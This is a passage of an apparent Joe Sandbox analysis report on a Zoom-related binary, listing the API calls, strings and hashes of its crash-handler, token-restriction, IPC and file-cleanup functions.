                • LoadLibraryW.KERNEL32(?,00D34CD0,00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE3DF
                • FreeLibrary.KERNEL32(00000000,?,00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE401
                  • Part of subcall function 00CE2016: __EH_prolog3.LIBCMT ref: 00CE201D
                  • Part of subcall function 00CE2016: CoCreateGuid.OLE32(00000000,00000010,00CDE40F,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CE2048
                  • Part of subcall function 00CE2016: UuidToStringA.RPCRT4(00000000,00000000), ref: 00CE2057
                  • Part of subcall function 00CE2016: RpcStringFreeA.RPCRT4(00000000), ref: 00CE2080
                • GetCurrentProcessId.KERNEL32(00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE471
                • LoadLibraryW.KERNEL32(kernel32.dll,?,?,00000000,00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00CDE58C
                • GetProcAddress.KERNEL32(00000000,SetProcessUserModeExceptionPolicy), ref: 00CDE59E
                • GetProcAddress.KERNEL32(00000000,GetProcessUserModeExceptionPolicy), ref: 00CDE5AD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE5C9
                  • Part of subcall function 00CE0BC6: __EH_prolog3.LIBCMT ref: 00CE0BCD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE5E1
                • FreeLibrary.KERNEL32(00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDE5EA
                  • Part of subcall function 00CE1F95: __EH_prolog3.LIBCMT ref: 00CE1F9C
                  • Part of subcall function 00CE1F95: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000104,00000000,00000008,00CDE324,00000000,00000000,00000000,?,?,?,?,?), ref: 00CE1FDA
                Strings
                • The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag., xrefs: 00CDE160
                • Unspecified error. - Crash handler init, xrefs: 00CDE02E
                • Couldn't generate crash name GUID., xrefs: 00CDE413
                • Couldn't create crash report directory., xrefs: 00CDE4CC
                • GetProcessUserModeExceptionPolicy, xrefs: 00CDE5A4
                • CrashSender.exe is not found in the specified path., xrefs: 00CDE276
                • Application version is not specified., xrefs: 00CDE0F7
                • zCrashReport.exe, xrefs: 00CDE1ED
                • Couldn't set C++ exception handlers for current process., xrefs: 00CDE564
                • Couldn't load dbghelp.dll., xrefs: 00CDE3EB, 00CDE418
                • %s\CrashRpt\UnsentCrashReports\%s_%s, xrefs: 00CDE44B
                • CrashRpt%d.dll, xrefs: 00CDE19B
                • Missing language file or wrong language file version., xrefs: 00CDE2FD
                • dbghelp.dll, xrefs: 00CDE34D
                • crashrpt_lang.ini, xrefs: 00CDE2A2
                • Success. Crash handler init, xrefs: 00CDE5F0
                • kernel32.dll, xrefs: 00CDE587
                • Couldn't set C++ exception handlers for main execution thread., xrefs: 00CDE580
                • SetProcessUserModeExceptionPolicy, xrefs: 00CDE598
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3Library$File$Cmm@@FreeLoadModuleNameState@Unlock@$AddressCreateCriticalCurrentProcSectionString$CloseEnterGuidH_prolog3_HandleLeaveProcessThreadUuid
                • String ID: %s\CrashRpt\UnsentCrashReports\%s_%s$Application version is not specified.$Couldn't create crash report directory.$Couldn't generate crash name GUID.$Couldn't load dbghelp.dll.$Couldn't set C++ exception handlers for current process.$Couldn't set C++ exception handlers for main execution thread.$CrashRpt%d.dll$CrashSender.exe is not found in the specified path.$GetProcessUserModeExceptionPolicy$Missing language file or wrong language file version.$SetProcessUserModeExceptionPolicy$Success. Crash handler init$The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.$Unspecified error. - Crash handler init$crashrpt_lang.ini$dbghelp.dll$kernel32.dll$zCrashReport.exe
                • API String ID: 1722482660-1068515031
                • Opcode ID: df9d03bb0ac1f4354cb2c4d0d403eda947f019879b6a72de72e1f57a3a4f489a
                • Instruction ID: 3937b049abf5fca9adc096e6aba5a1f24993072a63c947a3f0419522d3f0c34f
                • Opcode Fuzzy Hash: df9d03bb0ac1f4354cb2c4d0d403eda947f019879b6a72de72e1f57a3a4f489a
                • Instruction Fuzzy Hash: BE02AC31900249EBCF14EFA4C886AFDB7B5AF44314F24415AF612AB3D2DB749E05EB61
                Function 00CBE114 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 202memoryCOMMON
                Download Yara Rule
                APIs
                • OpenProcessToken.ADVAPI32(00000000,00000002,?,?,00000000,00000000), ref: 00CBE16B
                • GetLastError.KERNEL32 ref: 00CBE175
                • CloseHandle.KERNEL32(00000000), ref: 00CBE186
                • CloseHandle.KERNEL32(00000000), ref: 00CBE195
                • FreeSid.ADVAPI32(00000000), ref: 00CBE1A4
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CBE1B0
                • HeapFree.KERNEL32(00000000), ref: 00CBE1B7
                • FreeSid.ADVAPI32(00000000), ref: 00CBE1C6
                • CloseHandle.KERNEL32(?), ref: 00CBE1D8
                • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 00CBE204
                • GetLastError.KERNEL32 ref: 00CBE20E
                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CBE230
                • CreateWellKnownSid.ADVAPI32(0000006A,00000000,00000000,?), ref: 00CBE254
                • GetLastError.KERNEL32 ref: 00CBE25E
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00CBE27D
                • HeapAlloc.KERNEL32(00000000), ref: 00CBE284
                • CreateWellKnownSid.ADVAPI32(0000006A,00000000,00000000,?), ref: 00CBE2A9
                • CreateRestrictedToken.ADVAPI32(?,00000001,00000001,?,00000000,00000000,00000000,00000000,?), ref: 00CBE2D8
                • AllocateAndInitializeSid.ADVAPI32(00000008,00000001,00002000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CBE2FE
                • SetTokenInformation.ADVAPI32(?,00000019,00000000,00000008), ref: 00CBE324
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: HeapToken$CloseCreateErrorFreeHandleLastProcess$AllocateInitializeKnownWell$AllocDuplicateInformationOpenRestricted
                • String ID:
                • API String ID: 4290880295-3916222277
                • Opcode ID: bb9b9fa1f838480271dd22420f5944d105e473b4fa968cca1d40b14ebe5348a2
                • Instruction ID: f0e94f8ad6a0d6cdd863c30c954e9dd3e6d2822a68cd356589871b346355650b
                • Opcode Fuzzy Hash: bb9b9fa1f838480271dd22420f5944d105e473b4fa968cca1d40b14ebe5348a2
                • Instruction Fuzzy Hash: 5F611271E00308BBEB109FA5DC49BEEBBB9FF48B01F144029F511F6291DB749A46DA61
                Function 00CDC84B Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 187threadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00CDC74F: __EH_prolog3_GS.LIBCMT ref: 00CDC756
                  • Part of subcall function 00CDC74F: GetCommandLineW.KERNEL32(00000034,00CDC868,00000000,00000000), ref: 00CDC76F
                  • Part of subcall function 00CDC74F: LoadLibraryW.KERNEL32(mmdevapi.dll,runaszvideo,00000000,00000000), ref: 00CDC7B0
                  • Part of subcall function 00CDC74F: CoInitializeEx.OLE32(00000000,00000002), ref: 00CDC7BC
                  • Part of subcall function 00CDC74F: CoCreateInstance.OLE32(00D4212C,00000000,00000017,A95664D2,?), ref: 00CDC7F2
                  • Part of subcall function 00CDC74F: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?), ref: 00CDC833
                  • Part of subcall function 00CDCAC4: EnterCriticalSection.KERNEL32(00DFFB90,00000000,?), ref: 00CDCADF
                  • Part of subcall function 00CDCAC4: GetCurrentThreadId.KERNEL32 ref: 00CDCAE5
                  • Part of subcall function 00CDCAC4: LeaveCriticalSection.KERNEL32(00DFFB90,?,00000000,?,?), ref: 00CDCB3D
                • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,00000000,00000000), ref: 00CDC959
                • PathAppendW.SHLWAPI(?,\zoom\data\Zoom.us.ini), ref: 00CDC96F
                • GetPrivateProfileIntW.KERNEL32(Dump,type,00000000,?), ref: 00CDC98B
                • CreateThread.KERNEL32(00000000,00000000,00CDC470,00000000,00000004,?), ref: 00CDCA2B
                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00CDCA3F
                • GetCurrentThreadId.KERNEL32 ref: 00CDCA4A
                • ResumeThread.KERNEL32 ref: 00CDCA61
                  • Part of subcall function 00CDEC77: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,00000004,00CDCA8B,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CDEC8B
                Strings
                • type, xrefs: 00CDC981
                • \zoom\data\Zoom.us.ini, xrefs: 00CDC963
                • Error allocating memory for crash handler., xrefs: 00CDC8D7
                • Dump, xrefs: 00CDC986
                • pInfo is NULL or pInfo->cb member is not valid., xrefs: 00CDCA8D
                • crInstallW finished: %d, xrefs: 00CDCA9C
                • Can't install crash handler to the same process twice., xrefs: 00CDC8AC
                • Success. crInstallW : %x, xrefs: 00CDC891
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Thread$Create$Cmm@@CriticalCurrentPathSectionState@Unlock@$AppendCommandEnterEventFolderH_prolog3_InitializeInstanceLeaveLibraryLineLoadPrivateProfileResume
                • String ID: Can't install crash handler to the same process twice.$Dump$Error allocating memory for crash handler.$Success. crInstallW : %x$\zoom\data\Zoom.us.ini$crInstallW finished: %d$pInfo is NULL or pInfo->cb member is not valid.$type
                • API String ID: 3237976360-261031309
                • Opcode ID: e3341891bc5c251784745aa5545f7eff14fe782cf9ed89b73540ec73b174d156
                • Instruction ID: 6f682faa4395a08f10c4bdcc7f01ad12e9f307aab44f84b65b3f1f1f22f6beeb
                • Opcode Fuzzy Hash: e3341891bc5c251784745aa5545f7eff14fe782cf9ed89b73540ec73b174d156
                • Instruction Fuzzy Hash: 18615F7594031AAFDB20DF65DCC9EAAB7F5BB48700F10446AF60992350DB719A85EF20
                Function 00CD85C0 Relevance: 20.1, APIs: 13, Instructions: 616COMMON
                Download Yara Rule
                APIs
                • _strcspn.LIBCMT ref: 00CD8658
                • _strcspn.LIBCMT ref: 00CD867A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(9FB8111D,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00D1B015,000000FF), ref: 00CD8697
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00D1B015), ref: 00CD86CD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CD86E7
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000000), ref: 00CD8800
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00D1B015), ref: 00CD881E
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CD884F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00CD8869
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00CD887F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CD8894
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CD88B5
                • Concurrency::cancel_current_task.LIBCPMT ref: 00CD8CA2
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$_strcspn$Concurrency::cancel_current_task
                • String ID:
                • API String ID: 1478353410-0
                • Opcode ID: 602a07a7c16ee30234300de05a59518d834c405437589d530a58b98f05de4919
                • Instruction ID: 7e463e3fd53535655e0132b45774c730c2e533f480e6792b10a729dc13dd3960
                • Opcode Fuzzy Hash: 602a07a7c16ee30234300de05a59518d834c405437589d530a58b98f05de4919
                • Instruction Fuzzy Hash: 84329371A00219DFCB14DFA8C884AAEBBB9FF49310F14415AE915EB351DB30EE45DBA1
                Function 00CDEBBC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 58COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00CDCAC4: EnterCriticalSection.KERNEL32(00DFFB90,00000000,?), ref: 00CDCADF
                  • Part of subcall function 00CDCAC4: GetCurrentThreadId.KERNEL32 ref: 00CDCAE5
                  • Part of subcall function 00CDCAC4: LeaveCriticalSection.KERNEL32(00DFFB90,?,00000000,?,?), ref: 00CDCB3D
                • CloseHandle.KERNEL32(?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEBEF
                • CloseHandle.KERNEL32(?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC00
                • CloseHandle.KERNEL32(?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC17
                • SetUnhandledExceptionFilter.KERNEL32(?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC2B
                • EnterCriticalSection.KERNEL32(?,?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC39
                • LeaveCriticalSection.KERNEL32(?,?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC40
                • CloseHandle.KERNEL32(?,?,?,00CDDF45,9FB8111D,?,?,?,Function_000C0300,000000FF,?,00CDDEEB), ref: 00CDEC58
                Strings
                • Can't destroy not initialized crash handler., xrefs: 00CDEBD2
                • Success., xrefs: 00CDEC64
                • Unspecified error - destroy., xrefs: 00CDEBBE
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CloseCriticalHandleSection$EnterLeave$CurrentExceptionFilterThreadUnhandled
                • String ID: Can't destroy not initialized crash handler.$Success.$Unspecified error - destroy.
                • API String ID: 746703204-4224588828
                • Opcode ID: aca592bf3d870b2e25fa8dd9d64bbc5170b78e08fccbd3d8cdfd9392493d14a2
                • Instruction ID: 2ee9482a07455d31cc6d29991f55463efef0c707b1909ce1e43fd0d8139c39e9
                • Opcode Fuzzy Hash: aca592bf3d870b2e25fa8dd9d64bbc5170b78e08fccbd3d8cdfd9392493d14a2
                • Instruction Fuzzy Hash: 45115A75605B13BFD710AF71DD88AA6BB69FF44741B00452BFA29C2350CB30EA52CAB1
                Function 00C5C9C7 Relevance: 16.6, APIs: 11, Instructions: 148threadtimeCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5C9CE
                • InitializeCriticalSection.KERNEL32(00000000,00000050,00C525B3,?,?,00000000,00000000), ref: 00C5CA34
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00000008,?,?,?,?,?,?,?,?,?,?,-00000004,00000000,\ZoomOutlookMAPI,?), ref: 00C5CA74
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                • GetCurrentProcessId.KERNEL32(?,00000008,?,?,?,?,?,?,?,?,?,?,-00000004,00000000,\ZoomOutlookMAPI,?), ref: 00C5CA7E
                • ?GenChannelName@CIPCChannelThread@ssb_ipc@@SAXABV?$CStringT@_W@Cmm@@IAAV34@@Z.RWSNDPQSKZ(00D334D0,00000000,?,?,?,?,?,?,?,?,?,?,-00000004,00000000,\ZoomOutlookMAPI,?), ref: 00C5CA89
                  • Part of subcall function 00C782A0: __EH_prolog3_GS.LIBCMT ref: 00C782A7
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z.RWSNDPQSKZ(00D334D8,00000000,?,000000FF), ref: 00C5CAEA
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(?), ref: 00C5CB01
                • ??0CIPCChannelThread@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@Channel@1@H@Z.RWSNDPQSKZ ref: 00C5CB1E
                • ?Start@CIPCChannelThread@ssb_ipc@@QAEHXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 00C5CB56
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00C5CB6A
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?), ref: 00C5CB7C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Channel$String$Thread@ssb_ipc@@$??0?$H_prolog3_$?_cstring_set@Channel@1@CriticalCurrentD@1@D@2@@std@@D@std@@DeallocateH_prolog3InitializeListener@Mode@1@Name@Now@ProcessSectionStart@State@Time@U?$char_traits@Unlock@V12@V34@@V?$allocator@V?$basic_string@
                • String ID:
                • API String ID: 840065177-0
                • Opcode ID: 98f559fa855cdc2b7d9afc79d895270763f147c4e2a3d2054c900752a29828d5
                • Instruction ID: baa59c8871d9192359b49d6389b57117f19e9bf75c3cdbf1fdd0315aac3f1881
                • Opcode Fuzzy Hash: 98f559fa855cdc2b7d9afc79d895270763f147c4e2a3d2054c900752a29828d5
                • Instruction Fuzzy Hash: 9C5134B0D04204DFDB08DFA9C585A9DBBF0BF48310F5481AEE419AB392DB749A49CF65
                Function 00C628A3 Relevance: 16.6, APIs: 11, Instructions: 135memoryfileCOMMON
                Download Yara Rule
                APIs
                • SetLastError.KERNEL32(0000000E,00000000,?), ref: 00C6291B
                • FindFirstFileW.KERNEL32(00000000,?,00000000,?), ref: 00C6292C
                • RemoveDirectoryW.KERNEL32(00000000), ref: 00C629A5
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000010,00000000), ref: 00C629B9
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C629C6
                • HeapFree.KERNEL32(00000000), ref: 00C629CD
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C629D9
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C629EE
                • HeapFree.KERNEL32(00000000), ref: 00C629F5
                • FindClose.KERNEL32(00000000), ref: 00C629FC
                • SetLastError.KERNEL32(00000057,00000000,?), ref: 00C62A09
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Heap$Find$ErrorFileFreeLastProcess$CloseCmm@@DirectoryFirstNextRemoveState@Unlock@
                • String ID:
                • API String ID: 1089375185-0
                • Opcode ID: 1d221e9fdafa3208bf88d03a96e545a480115253eed1a9642429d628aad96d78
                • Instruction ID: e86b65d35af0a59ef736691660ef9fbe60de89ab4327fd778b246945ece64736
                • Opcode Fuzzy Hash: 1d221e9fdafa3208bf88d03a96e545a480115253eed1a9642429d628aad96d78
                • Instruction Fuzzy Hash: B941E472208B016FD634EB70DCC9AAF77A9EB88725F00092DF955C62C1DF74990AD7A1
                Function 00CDC74F Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78comlibraryCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CDC756
                  • Part of subcall function 00CDA000: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00CDA062
                  • Part of subcall function 00CDA000: VerSetConditionMask.KERNEL32(00000000), ref: 00CDA06A
                  • Part of subcall function 00CDA000: VerSetConditionMask.KERNEL32(00000000), ref: 00CDA072
                  • Part of subcall function 00CDA000: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00CDA09E
                • GetCommandLineW.KERNEL32(00000034,00CDC868,00000000,00000000), ref: 00CDC76F
                • LoadLibraryW.KERNEL32(mmdevapi.dll,runaszvideo,00000000,00000000), ref: 00CDC7B0
                • CoInitializeEx.OLE32(00000000,00000002), ref: 00CDC7BC
                • CoCreateInstance.OLE32(00D4212C,00000000,00000017,A95664D2,?), ref: 00CDC7F2
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?), ref: 00CDC833
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
